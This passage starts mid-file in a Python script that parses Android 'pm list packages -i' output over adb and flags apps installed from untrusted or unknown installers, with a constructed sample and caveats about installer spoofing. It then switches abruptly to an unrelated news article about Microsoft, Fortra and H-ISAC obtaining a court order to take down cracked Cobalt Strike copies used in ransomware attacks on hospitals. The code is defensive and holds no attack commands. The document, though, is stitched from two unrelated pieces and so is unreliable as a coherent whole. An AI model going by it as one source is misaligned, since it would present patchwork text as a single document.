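LINE_RE = re.compile(r"^package:(?P<pkg>\S+)\s+installer=(?P<installer>\S+)$")


class InstalledApp(NamedTuple):
    package: str
    installer: Optional[str]  # None when pm reports installer=null


def parse_pm_list(output: str) -> List[InstalledApp]:
    """Parse `pm list packages -i` output into InstalledApp records, skipping noise."""
    apps: List[InstalledApp] = []
    for raw in output.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # blank lines or warnings that adb sometimes prints
        installer = m.group("installer")
        apps.append(InstalledApp(m.group("pkg"), None if installer == "null" else installer))
    return apps


def flag_suspicious(
    apps: List[InstalledApp], trusted: Set[str] = TRUSTED_INSTALLERS
) -> List[Tuple[str, str]]:
    """Return (package, reason) for every app that was not installed by a trusted store."""
    findings: List[Tuple[str, str]] = []
    for app in apps:
        if app.installer is None:
            findings.append((app.package, "installer=null: installed via adb or an unknown source"))
        elif app.installer in MANUAL_INSTALLERS:
            findings.append((app.package, "installed manually from an APK file"))
        elif app.installer not in trusted:
            findings.append((app.package, f"installed by untrusted installer {app.installer}"))
    return findings


# Constructed sample of `adb shell pm list packages -3 -i` output (not real device data).
SAMPLE_OUTPUT = """\
package:com.whatsapp  installer=com.android.vending
package:com.example.flashlightpro  installer=com.google.android.packageinstaller
package:com.android.sysservice  installer=null
package:org.mozilla.firefox  installer=com.android.vending
package:com.example.cleaner  installer=com.example.thirdpartystore
"""

if __name__ == "__main__":
    # Real use: adb shell pm list packages -3 -i | python triage_apps.py
    text = SAMPLE_OUTPUT if sys.stdin.isatty() else sys.stdin.read()
    for pkg, reason in flag_suspicious(parse_pm_list(text)):
        print(f"{pkg}: {reason}")
```

Treat the output as a triage list, not a verdict: the installer name is metadata recorded by the package manager, and `adb install -i` can set it to anything, so a trusted-looking installer is not proof of legitimacy. The `-3` flag also excludes system-partition packages, so a compromised firmware image would not appear here at all. Anything flagged is a candidate for the "delete suspicious apps" step, after you have confirmed you do not recognise it.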

Microsoft & Fortra Seek Court Order to Remove a Ransomware Hacking Tool That Targeted Hospitals

A number of cybersecurity businesses, including Microsoft, have launched a full-scale legal crackdown on one of the primary hacking tools used by cybercriminal groups in their operations. Microsoft, Fortra, and the Health Information Sharing and Analysis Center (H-ISAC) announced a broad legal strategy to combat cracked versions of Fortra's Cobalt Strike and abused Microsoft software development kits. 

Cobalt Strike is a widely used penetration testing and red-team tool that lets businesses evaluate their security defenses before a real attack. Malicious hackers, however, have for years used cracked versions of the tool to carry out devastating ransomware attacks and other intrusions.

In November 2021, the Department of Health and Human Services warned healthcare organizations that both state-backed hackers and cybercriminal groups were using the tool in their attacks. That same year, the now-defunct Conti ransomware group sought to use Cobalt Strike to implant malware on Ireland's publicly funded healthcare system.

On Friday, the United States District Court for the Eastern District of New York granted the organizations a court order authorizing them to seize domain names on which hostile actors had been storing and distributing cracked copies of Cobalt Strike.

The court ruling permits Microsoft, Fortra, and the H-ISAC to notify the relevant providers and take down IP addresses in the United States that are hosting tainted versions of these tools. These takedowns begin immediately, and the order allows further takedowns as criminals build new infrastructure.

On Thursday, Microsoft will also alert hosting providers in Latin America and the European Union about domain names suspected of hosting infected copies of Cobalt Strike.

Microsoft and Fortra were also granted a temporary restraining order against anyone who violates their programmes' copyright, making it easier for them to seize and shut down rogue versions of the software.

It is uncommon for private corporations to use the judicial system on their own to pursue dangerous hackers. While Microsoft has previously used court orders to take down specific groups, these steps are the company's first aimed at specific tools used by a diverse spectrum of actors.

"This is something that we jokingly call an advanced persistent disruption; it is not going to be done on Thursday," Amy Hogan-Burney, general manager and associate general counsel for cybersecurity policy and protection at Microsoft, told Axios.

Cybercriminals are frequently adaptable, and they have been quick to rebuild their networks following past law enforcement crackdowns.

After all the attention devoted to Cobalt Strike, Microsoft has already begun examining the tools it expects bad actors to turn to next, according to Hogan-Burney.